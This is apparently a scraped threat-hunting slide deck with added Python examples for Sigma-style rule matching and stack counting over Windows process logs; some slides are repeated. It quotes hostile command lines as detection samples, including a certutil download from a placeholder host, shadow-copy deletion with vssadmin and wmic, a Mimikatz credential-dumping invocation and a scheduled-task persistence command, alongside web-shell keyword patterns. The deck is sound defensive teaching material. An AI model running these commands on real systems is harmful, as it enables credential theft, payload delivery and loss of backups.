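    make("WS03", r"C:\Users\jdoe\AppData\Local\Temp\mimikatz.exe"),
    make("WS03", r"C:\Users\jdoe\AppData\Local\Temp\mimikatz.exe"),   # ran twice
    make("WS01", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    make("WS04", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
]

if __name__ == "__main__":
    for value, n in stack_count(TODAY):
        print(f"{n:3d} host(s)  {value}")
    print("LFO shortlist:", least_frequent(TODAY))
    print("New vs baseline:", new_since_baseline(TODAY, BASELINE))
```

The LFO shortlist returns both the one-host items (the analyst's procexp64 and the attacker's mimikatz); the baseline comparison drops procexp64 because it was already known, which is why the two views are used together rather than either alone.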
MACHINE LEARNING & THREAT HUNTING -
ADVANCED HUNTING
 Multiple SIEM vendors and security products use machine learning or AI to assist threat hunting.
 Machine learning uses classification, clustering and association algorithms to identify and detect anomalies in the network.
 Network traffic spikes, unusual user or computer account behavior, and any deviation from baselines can be identified by such techniques.
 Analytics is widely used in the modern world and has found its place in cyber security as well.
 Examples: Microsoft Defender, Microsoft ATA, QRadar SIEM, FireEye, etc.
MICROSOFT ATA
Source: Microsoft.com
THREAT HUNTING RESOURCES
 Threathunting.net
 MITRE ATT&CK – attack.mitre.org
 https://github.com/ThreatHuntingProject/ThreatHunting – David J. Bianco
 https://github.com/VVard0g/ThreatHunter-Playbook – Roberto Rodriguez (@Cyb3rWard0g)
 https://blog.menasec.net
 https://github.com/akky2892/Cyber-Threat-Hunting
 Whitepapers, blogs and articles on threat hunting.
 Research work on Twitter – Oddvar Moe, Florian Roth, Roberto Rodriguez, Olaf Hartong, David J. Bianco, Sqrrl, Samir (@SBousseaden) & many more.
 SANS Threat Hunting Summit, DEF CON, ATT&CKcon, DerbyCon, Nullcon webinars/webcasts …
CONCLUSION
Red Teamer Cyber Kill Chain vs Blue Teamer Defense Chain: Identify, Prevent, Detect, Respond, Recover
Thank You & Hunt IT!
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
 
Unlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power SystemsUnlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power Systems
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other Frameworks
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
Artificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraArtificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning era
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptxVulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 

Threat hunting in cyber world

INTRODUCTION TO THREAT HUNTING
• The process of proactively and iteratively searching through networks to detect and isolate advanced threats that evade existing security solutions.
• My definition – Finding stuff.
• Threat hunting is not a technology but an approach.
• A data-driven approach rather than the traditional alert-driven approach.
• Applying our knowledge in an effective way to look for anomalies in the environment.
• Two ways to perform hunting:
  • Manual
  • Automated/Machine-assisted
THREAT HUNTING IN CYBERWORLD
• In the cyber world, attackers are getting smarter day by day.
• Modern attacks are not reliably prevented or detected by the alerts a SIEM generates on its own.
• Need of the hour: a next-generation detection approach.
• Hunting is not tool-dependent, it is people-dependent.
• Machine learning can help to a certain extent, but manual intervention in triage is always required.
• Instead of reacting to attacks, let's start proactively looking for threats before the attack succeeds.
WHY PERFORM THREAT HUNTING
• The alert-driven approach alone is not sufficient.
• The hypothesis-driven approach is the future.
• Dependency on any particular tool should be eliminated: hunting can be performed with whatever tool gives you the data.
• Benefits: continuous improvement in detection capabilities, and finding unknown malicious activity.
TERMINOLOGIES IN THREAT HUNTING
• SIEM – Security Information & Event Management
• IOC – Indicators of Compromise
• TTP – Tactics, Techniques & Procedures
• IR – Incident Response
• EDR – Endpoint Detection and Response
• UEBA – User and Entity Behavior Analytics
• BIOC – Behavioral Indicators of Compromise
THREAT INTELLIGENCE
• Threat intelligence feeds deliver indicators such as URLs, file hashes, domains and IP addresses.
• Can be used to perform intelligent hunting.
• IOCs of an attack/threat are published by various research companies.
• Sources:
  • articles
  • security news
  • new public APT reports
  • Twitter
THREAT INTELLIGENCE
• BIOC – Behavioral indicators: what the adversary does, not just the artifacts it leaves behind.
• Threat hunting is effective when fed by proper intel.
• The Threat Intel team proposes new intel, the CIRT team builds a hypothesis and creates detection based on the intel, and the Threat Hunting team hunts with or without intel.
• Sources and tooling in the market: Cisco Talos, Palo Alto Unit 42, Cylance and AlienVault OTX (vendor intel and feeds); MISP (intel sharing platform); YARA rules (file signatures).
• Threat Intelligence + Threat Hunting = Intelligent Hunting
THREAT HUNTING METHODOLOGY
• There are different methods to perform threat hunting.
• We will be explaining the following:
  • Threat Hunting process
  • Threat Hunting loop
  • Pyramid of pain
  • Hunting Maturity model
  • ATT&CK for hunts
  • Hunt or be Hunted
THREAT HUNTING PROCESS
• Ways of hunting:
  • Manual – the analyst continuously looks for anything that could be evidence or an indicator of intrusion. It is important for the threat hunter to keep current on the latest security research.
  • Automated/Machine-assisted – the analyst uses software that leverages machine learning and UEBA to inform the analyst about potential risks. It helps in providing predictive and prescriptive analytics.
THREAT HUNTING PROCESS
• Hypothesis-driven approach
• What is a hypothesis?
  • An assumption about attacker behavior.
  • An actionable use case based on observations, intelligence and experience.
• Three types of hypotheses:
  • Analytics-driven: "Machine-learning and UEBA, used to develop aggregated risk scores that can also serve as hunting hypotheses" [5]
  • Situational-awareness driven: "Crown Jewel analysis, enterprise risk assessments, company- or employee-level trends" [5]
  • Intelligence-driven: "Threat intelligence reports, threat intelligence feeds, malware analysis, vulnerability scans" [5]
• A hypothesis can be developed from any public APT report, Twitter, security news, articles, etc.
THREAT HUNTING TECHNIQUES
• Searching – use of specialized queries that return results and artifacts.
• Clustering – unsupervised machine learning that groups similar data points, surfacing outliers and correlations within large datasets.
• Grouping – grouping related artifacts together (by host, user or time window) to identify anomalies.
• Stack counting – counting how many times each unique value of a column occurs and sorting by frequency; the rare end of the stack (the least common process, the least commonly accessed file) is where suspicious items tend to sit.
THREAT HUNTING MATURITY MODEL
(figure: Sqrrl Hunting Maturity Model) Source: Sqrrl
MITRE ATT&CK FRAMEWORK
• MITRE ATT&CK™ is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations.
• It is organized as TTPs – Tactics, Techniques and Procedures.
• MITRE has also come up with a project named CAR (Cyber Analytics Repository), a collection of analytics mapped to ATT&CK techniques.
• The MITRE team has catalogued the adversary behaviors and attack vectors carried out on a victim machine, with detection and mitigation notes for each technique.
• Its tactics loosely correspond to the phases of the Cyber Kill Chain, which makes it a convenient map for deciding where to hunt.
SIGMA RULES FOR THREAT HUNTING
• Sigma is a generic signature format for SIEM systems written by Florian Roth (@Neo23x0) and Thomas Patzke.
• Sigma is a generic and open signature format that allows you to describe relevant log events in a straightforward manner.
• Sigma is for log files what Snort is for network traffic and YARA is for files.
• Sigma rules carry ATT&CK tags, so a rule can be mapped back to the technique it detects.
• For using Sigma for threat hunting in a SIEM, refer to the Sigma-to project: https://github.com/akky2892/Sigma-to
HUNTING WEBSHELLS
• A web shell is a script written in a language supported by the target web server, uploaded to enable remote access to the machine.
• Mostly written in PHP or ASP.
• Multiple attack techniques can be used to plant a web shell on a web server – unrestricted file upload, SQL injection, RFI/LFI, exploitation of a vulnerable admin interface and many more…
• Popular web shells – C99, R57, etc.
• Let's hunt it!
HUNTING WEBSHELLS - KEYWORDS
• First way of hunting web shells – look for references to suspicious keywords within files on the web server, such as eval() or cmd.exe.
• For Linux – under the /var/www/html directory, search for PHP files containing suspicious functions:
  find /var/www/html -type f -name '*.php' -print0 | xargs -0 grep -El '(fsockopen|mail|exec|eval|system|base64_decode)'
• For Windows – use PowerShell to search in a similar way (run from the web root):
  Get-ChildItem -Recurse -Include '*.php' | Select-String -Pattern '(fsockopen|mail|exec|eval|system|base64_decode)' | ForEach-Object { $_.Path } | Sort-Object -Unique
• Expect noise: mail(), exec() and system() occur in legitimate code, so treat hits as candidates to triage, not as verdicts.
HUNTING WEBSHELLS - TOOLS
• Multiple tools can be used to hunt for web shells in your environment. These tools ship with IOCs and YARA rules to identify maliciousness.
  • LOKI IOC Scanner
  • PHP-Malware-Finder
  • unPHP
  • Linux Malware Detect
  • Invoke-ExchangeWebShellHunter
  • etc…
• In addition to these techniques, we can also use baseline deviation and file stacking (rare file names, owners or modification times under the web root) to hunt for web shells.
ENDPOINT HUNTING
• The endpoint is where malware behavior is most visible.
• Most post-exploitation techniques can be hunted using endpoint logs.
• File activity, registry activity and process activity can be used to hunt for malicious behavior.
• Attack techniques such as DLL injection and hook injection can be hunted down using endpoint logs; fuzzy hashing (ssdeep-style similarity hashing) is an analysis aid that helps cluster variants of the same malware family.
• MITRE ATT&CK is the best way to focus these efforts and use them to hunt for threats.
DLL INJECTION AND DLL HIJACKING
• Post-exploitation techniques.
• Hunt by monitoring Windows API calls, and by monitoring DLL loads and registry paths for changes (DLL search-order hijacking shows up as a DLL loaded from an unexpected, often user-writable, directory).
• The classic remote-thread injection sequence:
  • VirtualAllocEx reserves or changes a region of memory in the target process
  • WriteProcessMemory writes data (the DLL path or shellcode) into that region
  • CreateRemoteThread creates a thread in the address space of the other process to execute it
APPINIT DLLS
• PowerSploit (a PowerShell post-exploitation framework, not a component of PowerShell itself) contains modules that can be used for code injection.
• Monitoring malicious DLL loads – AppInit DLLs: DLLs specified in the AppInit_DLLs value of the registry key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows are loaded by user32.dll into every process that loads user32.dll, so any write to that value is worth hunting.
NETWORK HUNTING
• Network traffic hunting requires network traffic logs.
• Multiple tools can be used to analyze suspicious network traffic.
• In addition to packet capture and the malicious traffic analysis features of next-generation firewalls, UTMs and IDS/IPS, we also need to hunt for traffic that has bypassed these devices.
• Wireshark can be used.
• Let's look at a simple example:
NETWORK HUNTING – HTTPS TRAFFIC
Normal HTTPS                                        Suspicious HTTPS
Port 443 or 8443                                    Malware uses these ports as well
Traffic is encrypted (SSL/TLS)                      Traffic on 443 is not encrypted, or the TLS handshake details are empty
Server identified by FQDN (SNI / certificate)       Client connects to a bare IP address instead of an FQDN
Each of the right-hand signals is weak on its own (CDNs, IoT devices and some internal tools also connect to bare IPs); stack them and pivot on the client process before calling it malicious.
THREAT HUNTING USING SIEM
• Threat hunting is basically searching for something.
• We need proper and useful data to hunt for threats in the enterprise.
• A SIEM – Security Information & Event Management – is such a tool, and it can prove very useful in threat hunting.
• The SIEM collects logs from multiple devices across your enterprise network.
• In addition to threat intelligence feeds, a SIEM is very useful for querying the log database to identify anomalies.
• Let's look at some use cases:
THREAT HUNTING USING SIEM
(figure) Source: elastic.co
THREAT HUNTING USING SIEM
Famous email Word/Excel macro attachment chain:
• Phishing email containing a .doc with a macro
• The macro contains a script that launches powershell.exe
• powershell.exe loads a credential-dumping tool such as Mimikatz to pull hashes from memory (Mimikatz is an open-source attack tool, not a legitimate admin utility, and is often run in memory so nothing touches disk)
• Hunt for which commands were executed via Mimikatz
THREAT HUNTING USING SIEM
• Event Viewer logs forwarded to the SIEM can be used to hunt for multiple threats.
• Sysmon can be used to collect endpoint-specific logs based on a defined configuration.
• Search queries are useful in identifying malicious behavior inside the enterprise environment.
• In addition to threat intelligence and search queries, analytics based on machine learning is being built into SIEMs to automatically identify anomalies in the environment.
• We will look at some example hunts to make this concrete:
THREAT HUNTING HUNTS
Threat activity                  Hunts to look out for
Hunting suspicious accounts      Look for unusual accounts logging into machines with admin rights – Event ID 4672 (Special privileges assigned to new logon)
Hunting scheduled tasks          Event ID 4698 (scheduled task created); Task Scheduler operational log Event IDs 106, 200 & 201
Hunting pass-the-hash (PtH)      Event ID 4624 with Logon Type 3, Logon Process NtLmSsp, Key Length 0
Hunting service creation         Event ID 4697 (service installed; the System log records the same in 7045)
Hunting network shares           Event ID 5140 (network share object accessed) and 5145 (share object access checked); Event ID 4776 records NTLM credential validation and is better paired with the PtH hunt
Hunting process masquerading     Look at the path a process executes from – for example explorer.exe should run from C:\Windows\explorer.exe; the same name under a user-writable path such as AppData or Temp is suspect
THREAT HUNTING HUNTS
• PtH – look for remote logons followed shortly by execution or writing of binaries.
• IFEO – changes under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\xyz.exe\Debugger (the Debugger value is launched in place of xyz.exe, a persistence and hijack trick).
• rundll32.exe making connections to the internet.
• Deletion of shadow copies using wmic or vssadmin with *delete* in the command line.
THREAT HUNTING HUNTS
• Disabling system restore – registry write with key HKLM\Software\Microsoft\Windows NT\SystemRestore\DisableSR and value 1 (also watch the policy variant, HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableSR).
• Connections from a process other than a browser to suspicious domains, e.g. .tk, .onion, tor2web gateways, etc.
• certutil.exe used to download files from the internet – certutil.exe -urlcache -split -f http://example/file.txt
THREAT HUNTING HUNTS
• Monitor scheduled tasks – at and schtasks (Windows Task Scheduler) are used to schedule scripts for execution.
• Double-extension malware (invoice.pdf.exe).
• control.exe used to execute a file stored in an alternate data stream (ADS).
• gpscript.exe used to execute logon scripts.
• mavinject.exe used to execute code and read ADS files.
• hh.exe – executing and downloading files.
• scriptrunner.exe – execution.
• regsvr32.exe – downloading and executing a scriptlet from the internet.
• All of these are Microsoft-signed Windows binaries (LOLBins), so signature-based endpoint protection typically does not flag them; hunt on command-line arguments and parent/child process relationships instead.
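The hunts on the last three slides (certutil -urlcache, shadow-copy deletion, schtasks abuse) are exactly the kind of thing Sigma expresses as a selection map plus a condition. The block below is an added example, not code from the slides, the Sigma project or Sigma-to: a deliberately small evaluator that implements the subset of Sigma semantics these rules need (field modifiers contains, endswith, startswith and all; list values OR-ed; conditions of the form "selection" and "selection and not filter"), and runs three rules I wrote in Sigma's detection structure over constructed Sysmon Event ID 1 records. The ATT&CK tags are the technique IDs those behaviours map to; the rule titles, events, hostnames and process IDs are invented for the example. For production use, convert real Sigma rules with pySigma or sigmac rather than this evaluator.

```python
"""Minimal Sigma-style evaluator over Sysmon process-creation events (added example)."""

# Constructed Sysmon Event ID 1 records, reduced to the fields the rules reference.
SAMPLE_EVENTS = [
    {"ProcessId": "1001", "Computer": "WS01", "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://example/file.txt C:\Users\Public\file.txt"},
    {"ProcessId": "1002", "Computer": "WS01", "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -hashfile C:\Windows\notepad.exe SHA256"},      # benign certutil use
    {"ProcessId": "1003", "Computer": "WS02", "Image": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": "vssadmin.exe delete shadows /all /quiet"},
    {"ProcessId": "1004", "Computer": "WS02", "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": "wmic.exe shadowcopy list"},                                     # lists, does not delete
    {"ProcessId": "1005", "Computer": "WS03", "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": "wmic.exe shadowcopy delete"},
    {"ProcessId": "1006", "Computer": "WS03", "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r"schtasks.exe /create /sc onlogon /tn Updater /tr C:\Users\Public\u.exe"},
    {"ProcessId": "1007", "Computer": "WS01", "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks.exe /create /sc daily /tn VendorUpdate /tr "C:\Program Files\Vendor\upd.exe"'},
]

# Rules in Sigma's detection structure (hypothetical rules written for this example).
RULES = [
    {"title": "Certutil Download via URLCache", "tags": ["attack.t1105"],
     "detection": {
         "selection": {"Image|endswith": "\\certutil.exe",
                       "CommandLine|contains|all": ["urlcache", "http"]},
         "condition": "selection"}},
    {"title": "Shadow Copy Deletion", "tags": ["attack.t1490"],
     "detection": {
         "selection": {"Image|endswith": ["\\vssadmin.exe", "\\wmic.exe"],
                       "CommandLine|contains|all": ["shadow", "delete"]},
         "condition": "selection"}},
    {"title": "Scheduled Task Targeting User-Writable Path", "tags": ["attack.t1053.005"],
     "detection": {
         "selection": {"Image|endswith": "\\schtasks.exe",
                       "CommandLine|contains|all": ["/create", "/tr"]},
         "filter": {"CommandLine|contains": ["\\program files\\", "\\windows\\"]},
         "condition": "selection and not filter"}},
]


def _compare(value, pattern, mods):
    """Apply one Sigma value modifier; with no modifier Sigma means exact match."""
    if "contains" in mods:
        return pattern in value
    if "endswith" in mods:
        return value.endswith(pattern)
    if "startswith" in mods:
        return value.startswith(pattern)
    return value == pattern


def _match_field(value, spec, mods):
    """List values are OR-ed unless the 'all' modifier is present; matching is case-insensitive as in Sigma."""
    value = str(value).lower()
    patterns = [str(p).lower() for p in (spec if isinstance(spec, list) else [spec])]
    combine = all if "all" in mods else any
    return combine(_compare(value, p, mods) for p in patterns)


def _match_selection(event, selection):
    """Every field in a selection map must match (AND semantics); a missing field never matches."""
    for key, spec in selection.items():
        field, *mods = key.split("|")
        if field not in event or not _match_field(event[field], spec, mods):
            return False
    return True


def evaluate(rule, event):
    """Evaluate the two condition shapes used here: 'X' and 'X and not Y'."""
    det = rule["detection"]
    parts = det["condition"].split()
    if len(parts) == 1:
        return _match_selection(event, det[parts[0]])
    if len(parts) == 4 and parts[1:3] == ["and", "not"]:
        return _match_selection(event, det[parts[0]]) and not _match_selection(event, det[parts[3]])
    raise ValueError("unsupported condition: " + det["condition"])


def hunt(rules, events):
    """Return (rule title, Computer, ProcessId) for every rule/event pair that matches."""
    return [(r["title"], e["Computer"], e["ProcessId"])
            for r in rules for e in events if evaluate(r, e)]


if __name__ == "__main__":
    for title, host, pid in hunt(RULES, SAMPLE_EVENTS):
        print(f"{title:45} {host} pid={pid}")
```

The filter on the schtasks rule is the part worth copying: a rule that fires on every /create will be tuned out within a day, whereas excluding targets under Program Files and Windows keeps the hunt focused on tasks that point at user-writable paths, which is where the LOLBin abuse above actually shows up.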
THREAT HUNTING HUNTS
• Similar to the hunts discussed, there are many more techniques which can be used to hunt for threats.
• A collection of many such techniques is gathered and presented by MITRE ATT&CK and the Sigma rules.
• Hunting using a SIEM is the way ahead, but there are multiple SIEM vendors – RSA, Elasticsearch, ArcSight, QRadar, etc.
• To make life easier, I have prepared a master sheet of threat hunting hunts, mapping each to the respective SIEM vendor's query language:
• Query it & Hunt IT – https://github.com/akky2892/Sigma-to/blob/master/Sigma-to.xlsx
REAL WORLD HUNTING PROCESS
What is threat hunting? The human-centric process of proactively searching for evidence of attacks. Anyone can threat hunt; experienced threat hunters have better models.
Threat hunting is the application of one or more models or frameworks to a problem. The easiest framework to start with is Attack Centric Hunting (ACH). In ACH you focus on seeking evidence that identifies a specific attack. It is a 4-step process that starts with a question:
• 1. Question – has an attack or incident occurred on my network?
• 2. What am I looking for?
• 3. Where am I likely to find it?
• 4. How can I manipulate the data to find it?
REAL WORLD HUNTING PROCESS
Example question: has credential theft happened on my network?
• 1. What am I looking for?
  a) Evidence of credential-dumping application execution.
  b) Never-before-seen processes, process anomalies.
• 2. Where am I likely to find it?
  a) Windows process execution logs.
• 3. How can I manipulate the data to see it?
  a) Aggregate Event ID 4688 by process name for all endpoints and sort by least frequent occurrence (LFO). (Event ID 4688 = process creation; enable command-line auditing so the event carries the full command line.)
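Step 3 above, and the stack counting technique from the techniques slide, in working form. This is an added example written for this page, not code from the slides: it parses a constructed TSV export of Security log 4688 events, stack-counts one field (full image path, or just the image name) and returns the rarest values first, with how many hosts each was seen on. It also answers the masquerading hunt from the hunts table by checking well-known binaries against an assumed baseline of expected directories. Hostnames, timestamps, paths and the credential-dumper name are all invented sample data.

```python
"""Stack counting (least-frequent-occurrence) over Windows 4688 events (added example)."""
import csv
import io
import ntpath
from collections import Counter, defaultdict

# Constructed sample: Security log events flattened to TSV. The last row is a 4689 (process exit)
# to show the parser filtering on event_id; the mimikatz-style row and the explorer.exe copy in
# C:\Users\Public are the two things the hunt should surface.
_ROWS = [
    ("2024-04-01T08:00:01", "WS01", "4688", r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs"),
    ("2024-04-01T08:00:02", "WS02", "4688", r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs"),
    ("2024-04-01T08:00:03", "WS03", "4688", r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs"),
    ("2024-04-01T08:01:00", "WS01", "4688", r"C:\Windows\explorer.exe", "explorer.exe"),
    ("2024-04-01T08:01:05", "WS02", "4688", r"C:\Windows\explorer.exe", "explorer.exe"),
    ("2024-04-01T08:02:00", "WS01", "4688", r"C:\Program Files\Google\Chrome\Application\chrome.exe", "chrome.exe"),
    ("2024-04-01T08:02:10", "WS02", "4688", r"C:\Program Files\Google\Chrome\Application\chrome.exe", "chrome.exe"),
    ("2024-04-01T08:03:00", "WS01", "4688", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell.exe -NoProfile"),
    ("2024-04-01T08:03:30", "WS03", "4688", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell.exe -NoProfile"),
    ("2024-04-01T08:04:00", "WS03", "4688", r"C:\Users\bob\AppData\Local\Temp\m1m1.exe", "m1m1.exe privilege::debug sekurlsa::logonpasswords"),
    ("2024-04-01T08:05:00", "WS02", "4688", r"C:\Users\Public\explorer.exe", "explorer.exe"),
    ("2024-04-01T08:05:01", "WS02", "4689", r"C:\Users\Public\explorer.exe", ""),
]
SAMPLE_4688 = ("time\thost\tevent_id\tnew_process_name\tcommand_line\n"
               + "".join("\t".join(r) + "\n" for r in _ROWS))


def parse_4688(text):
    """Parse the TSV export and keep only process-creation (4688) events."""
    return [row for row in csv.DictReader(io.StringIO(text), delimiter="\t")
            if row["event_id"] == "4688"]


def stack(events, field, normalize=str.lower):
    """Stack-count one field: (value, count, distinct_hosts) sorted rarest first."""
    counts, hosts = Counter(), defaultdict(set)
    for ev in events:
        key = normalize(ev[field])
        counts[key] += 1
        hosts[key].add(ev["host"])
    # Rare count, then rare host prevalence, then name for a stable order.
    return sorted(((k, c, len(hosts[k])) for k, c in counts.items()),
                  key=lambda t: (t[1], t[2], t[0]))


def image_name(path):
    """Normalize a full image path to its lowercase file name (stacking by name instead of path)."""
    return ntpath.basename(path).lower()


# Assumed baseline of where well-known binaries are expected to run from; extend per environment.
EXPECTED_DIRS = {
    "explorer.exe": {r"c:\windows"},
    "svchost.exe": {r"c:\windows\system32", r"c:\windows\syswow64"},
}


def find_masquerades(events, expected=EXPECTED_DIRS):
    """Flag events whose image name is a known system binary running from an unexpected directory."""
    hits = []
    for ev in events:
        path = ev["new_process_name"].lower()
        name = ntpath.basename(path)
        if name in expected and ntpath.dirname(path) not in expected[name]:
            hits.append(ev)
    return hits


if __name__ == "__main__":
    evs = parse_4688(SAMPLE_4688)
    print("rarest image paths (LFO):")
    for path, count, nhosts in stack(evs, "new_process_name")[:3]:
        print(f"  {count:>3} on {nhosts} host(s)  {path}")
    print("masquerading candidates:")
    for ev in find_masquerades(evs):
        print(f"  {ev['host']}  {ev['new_process_name']}")
```

Stacking by full path surfaces both the Temp-directory dumper and the stray explorer.exe with a count of 1; stacking by name alone hides the second one inside three legitimate-looking explorer.exe launches, which is why the masquerading check compares the directory against a baseline rather than relying on rarity.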
MACHINE LEARNING & THREAT HUNTING - ADVANCED HUNTING
• Multiple SIEM vendors and security products use machine learning or AI to assist threat hunting.
• Machine learning uses classification, association and anomaly-detection algorithms to identify and detect anomalies in the network.
• Network traffic spikes, unusual user or computer account behavior, and any deviation from baselines can be identified by such techniques.
• Analytics is widely used in the modern world and it has found its place in cyber security as well.
• Examples: Microsoft Defender, Microsoft ATA, QRadar SIEM, FireEye, etc.
THREAT HUNTING RESOURCES
• threathunting.net
• MITRE ATT&CK – attack.mitre.org
• https://github.com/ThreatHuntingProject/ThreatHunting – David J. Bianco
• https://github.com/VVard0g/ThreatHunter-Playbook – Roberto Rodriguez (@Cyb3rWard0g)
• https://blog.menasec.net
• https://github.com/akky2892/Cyber-Threat-Hunting
• Whitepapers, blogs and articles on threat hunting.
• Research work on Twitter – Oddvar Moe, Florian Roth, Roberto Rodriguez, Olaf Hartong, David J. Bianco, Sqrrl, Samir Bousseaden (@SBousseaden) & many more.
• SANS Threat Hunting Summit, DEF CON, ATT&CKcon, DerbyCon, Nullcon; webinars and webcasts…
CONCLUSION
Red Teamer Cyber Kill Chain vs Blue Teamer Defense Chain: Identify, Prevent, Detect, Respond, Recover.